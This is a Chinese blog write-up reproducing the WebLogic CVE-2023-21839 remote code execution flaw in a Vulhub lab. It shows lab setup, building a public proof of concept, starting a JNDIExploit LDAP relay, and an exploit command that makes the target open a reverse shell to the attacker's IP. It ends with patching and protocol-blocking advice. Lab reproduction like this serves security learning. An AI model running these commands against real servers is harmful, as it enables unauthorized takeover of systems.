【CVE-2023-21839】Vulhub Weblogic未授权远程代码执行漏洞复现

最新推荐文章于 2024-07-10 10:00:00 发布
最新推荐文章于 2024-07-10 10:00:00 发布
阅读量328 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43175881/article/details/133316276
版权

项目介绍

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

漏洞概述

WebLogic存在远程代码执行漏洞,该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏易受攻击的WebLogic服务器,成功利用此漏洞可能导致Oracle WebLogic服务器被接管或敏感信息泄露。漏洞原理其实是通过Weblogic t3/iiop协议支持远程绑定对象bind到服务端,当远程对象继承自OpaqueReference时,lookup查看远程对象时,服务端调用远程对象getReferent方法,其中的remoteJNDIName参数可控,导致攻击者可利用rmi/ldap远程协议进行远程命令执行。

环境介绍

kali2023 (攻击机)
centos7.8 (靶机)

环境搭建

Vulhub 环境下载
靶机执行 git clone https://github.com/vulhub/vulhub.git后
出现vulhub目录

在这里插入图片描述

### 进入此目录
cd /vulhub/weblogic/CVE-2023-21839
### 运行docker
docker-compose up -d

访问http://靶机ip:7001/console 出现weblogic 登录页面
在这里插入图片描述
进入kali攻击机,编译安装go语言环境

apt install gccgo-go 
apt install golang-go

环境搭建结束

复现过程

开始复现
poc地址:https://github.com/4ra1n/CVE-2023-21839

下载后拖入kali解压

unzip cve-2023-21839-master.zip
进入poc环境

在这里插入图片描述

编译
go build -o CVE-2023-21839
编译后

在这里插入图片描述

中转工具

JNDIExploit v1.4地址:
https://github.com/WhiteHSBG/JNDIExploit/releases/tag/v1.4

下载拖入kali解压
在这里插入图片描述

###解压
unzip JNDIExploit.v1.4.zip
解压并进入

在这里插入图片描述

开启中转工具

(-i 后为攻击机ip)

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.xxx.xxx

在这里插入图片描述

kali再开一个终端进行监听

在这里插入图片描述

kali再开一个终端进行攻击

进入到刚刚下载cve的poc的目录下/cve-2023-21839-master/cmd

(-ip和-port为靶机的IP和端口,-ldap里的IP都为攻击IP,前面的端口号是中转工具的默认端口,后面为导出的端口号)

./CVE-2023-21839 -ip 192.168.xxx.xx1 -port 7001 -ldap ldap://192.168.xxx.xx2:1389/Basic/ReverseShell/192.168.xxx.xx2/7892

在这里插入图片描述

此刻再看nc监听终端成功返回shell

在这里插入图片描述

此刻漏洞复现已经成功
或者通过dnslog 也可拿到结果

在这里插入图片描述在这里插入图片描述

后谈

如果没有拿到shell,可能是java jdk版本不对,重新安装kali jdk版本

###卸载原有版本
apt-get remove openjdk*
apt autoremove

下载java1.8
下载链接:https://repo.huaweicloud.com/java/jdk/8u202-b08/jdk-8u202-linux-x64.tar.gz
下载后拖入kali

tar -xzvf jdk-8u202-linux-x64.tar.gz #解压

进入路径
在这里插入图片描述
以下依次执行(如果解压路径 和我不同,请自行更改命令中路径)

export JAVA_HOME=/opt/jdk1.8.0_202 
export CLASSPATH=.:${JAVA_HOME}/lib
export PATH=${JAVA_HOME}/bin:$PATH

update-alternatives --install /usr/bin/java java /opt/jdk1.8.0_202/bin/java 1
update-alternatives --install /usr/bin/javac javac /opt/jdk1.8.0_202/bin/javac 1
update-alternatives --set java /opt/jdk1.8.0_202/bin/java
update-alternatives --set javac /opt/jdk1.8.0_202/bin/javac
java -version		//完成查看版本

总结

1、目前Oracle已经修复该漏洞并发布补丁,受影响的用户可参考官方通告及时下载并更新补丁,下载地址:https://support.oracle.com/rs?type=doc&id=2917213.2。

2、通过控制T3协议的访问来阻断利用T3协议的漏洞攻击。

3、通过关闭IIOP协议来阻断利用IIOP协议的漏洞攻击。

白_文
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_51577576的博客
03-12 1682
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839) WebLogic是美商Oracle的主要产品之一,系购并得来。是商业市场上主要的Java应用服务器软件之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件,以及OEPE开发工具。
CVE-2023-21839Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 4109
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
CVE-2023-21839 WebLogic Server RCE分析
Jay
04-18 827
在后续的进行lookup操作之前会检查 JNDI 环境是否已正确配置以访问远程资源,主要是对jndiEnvironment和remoteJNDIName的检测,如果在if中的任何一个条件为真,那么将调用对象的lookup方法,如果 if 语句中的所有条件都为假,则会进入检查cachedReferent字段的阶段。weblogic10 及以后的版本,不能直接使用server/lib 目录下的 weblogic.jar 了,需要手动执行一个命令生成手动生成 wlfullclient.jar。
Weblogic授权远程代码执行漏洞 (CVE-2023-21839)
qq_69775412的博客
08-09 824
Weblogic 允许远程用户在授权的情况下通过IIOP/T3进行JNDI lookup 操作,当JDK版本过低或本地存在javaSerializedData时,这可能会导致RCE漏洞
Weblogic 管理控制台授权远程命令执行漏洞CVE-2020-14882,CVE-2020-14883)
最新发布
m0_68045701的博客
07-10 1933
在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。CVE-2020-14882允许授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。首先,我们需要构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上,如。访问后台后是一个低权限的用户,无法安装应用,也无法直接执行任意代码
Weblogic CVE-2020-14882 授权远程命令执行漏洞
读书 买花 长大
02-25 617
CVE-2020-14882
CVE-2023-21839 Weblogic远程代码执行漏洞复现
热爱学习,喜欢折腾!
04-24 1026
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
CVE-2023-21839vulhub weblogic 漏洞复现
weixin_46044002的博客
07-06 342
由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
Weblogic远程代码执行漏洞(CVE-2020-14645)复现
玄道的网安博客
07-25 4595
前言 WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。Oracle WebLogic Server存在远程代码执行漏洞。攻击者可利用漏洞实现远程代码执行。 环境搭建 下载地址: https://www.oracle.com/middleware/technologies/weblogic-server-insta.
复现CVE-2021-2109 (Weblogic Server远程代码执行漏洞)
记录并分享学习安全的知识点..
01-19 3991
一、漏洞介绍 2021年1月20日,Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。 二、影响版本 WebLogic 3.6.0.0 WebLogic 1.3.0.0 WebLogic 2.1.3.0 WebLogic 2.1.4.0 漏洞判别方式:http://x.x.x.x:7001/conso
CVE-2020-14882 WebLogic远程代码执行漏洞复现
热门推荐
千寻的博客
12-17 1万+
Weblogic简介 WebLogic Server是美国Oracle公司的主要产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场上主要的Java(J2EE)应用服务器软件之一。 漏洞描述 2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在经身份验证的情况下控制 We
CVE-2020-14882 weblogic授权远程命令执行漏洞
栉风沐雪的博客
02-22 4447
Oracle WebLogic Server 远程代码执行漏洞CVE-2020-14882)POC 被公开,经身份验证)的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。
Weblogic-CVE-2023-21839
Continuejww的博客
12-14 949
RCE漏洞,该漏洞允许经身份验证的远程,通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致Oracle WebLogic服务器被接管,通过远程协议进行远程命令执行,当或本地存在小工具(javaSerializedData)时,可能导致远程代码执行。由此可见:CVE-2023-21839是一个weblogic的JNDI注入漏洞
Weblogic远程代码执行漏洞 CVE-2023-21839
昀光Icrus的博客
04-10 1089
记录个人在本地环境下复现Weblogic远程命令执行漏洞CVE-2023-21839的过程,每一步都将使用的工具下载地址附在了链接中,用于记录学习
CVE-2023-21839:Oracle WebLogic Server RCE
qq_45747465的博客
07-07 576
努力提升自己呀
漏洞复现Weblogic CVE-2023-21839
zg_111的博客
03-23 6582
Weblogic CVE-2023-21839漏洞复现
CVE-2023-21839 Weblogic IIOP RCE复现
Love&Share
04-14 1667
WebLogic是美国Oracle公司出品的一个application server,用于本地和云端开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic Server是一个基于JAVAEE架构的中间件,将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中,提供了Java Enterprise Edition (EE)和Jakarta EE的可靠、成熟和可扩展的实现。
Weblogic 远程命令执行漏洞CVE-2023-21839
Myu_wzy的博客
04-27 913
Weblogic 远程命令执行漏洞CVE-2023-21839
Apache Unomi 1.5.2以下版本面临CVE-2020-13942远程代码执行漏洞
"CVE-2020-13942 是一个针对Apache Unomi的严重安全漏洞,涉及远程代码执行(Remote Code Execution, RCE)风险。Apache Unomi 是一款开源的事件管理和分析平台,用于收集、处理和分析应用程序的日志和事件数据。这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值